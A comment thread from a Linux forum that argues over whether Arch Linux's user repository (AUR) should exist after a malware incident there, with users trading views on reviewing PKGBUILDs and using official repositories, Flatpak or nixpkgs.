this post was submitted on 16 Jun 2026
180 points (98.9% liked)

Linux

14018 readers
399 users here now

A community for everything relating to the GNU/Linux operating system (except the memes!)

Also, check out:

Original icon base courtesy of lewing@isc.tamu.edu and The GIMP

founded 3 years ago
MODERATORS
Ategon@programming.dev
anzo@programming.dev
dwraf_of_ignorance@programming.dev
180
Arch Linux Blocks New AUR Registrations Amid Malware Cleanup (linuxiac.com)
submitted 3 days ago by cm0002@lemy.lol to c/linux@programming.dev
61 comments fedilink hide all child comments
you are viewing a single comment's thread
view the rest of the comments
[–] KssioAug@lemmy.dbzer0.com 20 points 3 days ago* (last edited 3 days ago) (24 children)

The entire philosophy of Arch is to put user in control. The PKGBUILD format is plain-text and reviewable. The documented best practice has always been to read the PKGBUILD and the .install files before building.

I'm not saying they shouldn't look into measures to make it less prone to such attacks, but "take it down" is a very stupid take. If people can't deal with the existence of AUR, there's plenty of different distros to choose already.

[–] ZombieCyborgFromOuterSpace@lemmy.ca 0 points 3 days ago (23 children)

In control of installing malware?

I get what you mean, but people are stupid. There needs to be guardrails to prevent these things from happening. That's why the AUR is a bad idea and it should be shut down.

You want your software to be available for a distro? Go through the proper channels. Submit it for review and get it approved. If you stop maintaining it, they remove it. Plain and simple.

That's why you don't have this problem with other distros. Arch made it too easy to download and install unverified, untested, potentially malicious software through the AUR and now every idiot that thinks they know what they're doing are infecting their systems.

[–] kieron115@startrek.website 0 points 2 days ago (13 children)

Arch USER Repository. Use the official repositories if it's a concern.

[–] ZombieCyborgFromOuterSpace@lemmy.ca 0 points 2 days ago (2 children)

Who here has NEVER used the AUR with their Arch install raise your hand. I'll wait.

[–] Solemarc@lemmy.world 2 points 1 day ago* (last edited 1 day ago) (1 children)

I don't use any AUR packages, I don't even have an AUR helper installed ATM, If it's not in core/extra/multilib I use Flatpak. Generally I will go to Flatpak's for userland apps, Krita and Firefox are both in extra (I think?) I still use the Flatpak's for both. If I'm going to use the AUR I would generally prefer to just build from source.

[–] ZombieCyborgFromOuterSpace@lemmy.ca 1 points 1 day ago

That's pretty sound.

[–] moonpiedumplings@programming.dev 2 points 1 day ago* (last edited 1 day ago) (1 children)

Me!!

I stopped using it a while ago, and I get all my non arch packaged packages from nixpkgs. Nixpkgs is bigger than the AUR and the Arch repos combined. It has pretty much all of the stuff I would have otherwise gotten from the AUR. But I find Nixos frustrating to use, so I stick to Arch.

I felt extremely vindicated in my decision to avoid the AUR when the AUR malware happened.

load more comments (10 replies)
load more comments (19 replies)
load more comments (19 replies)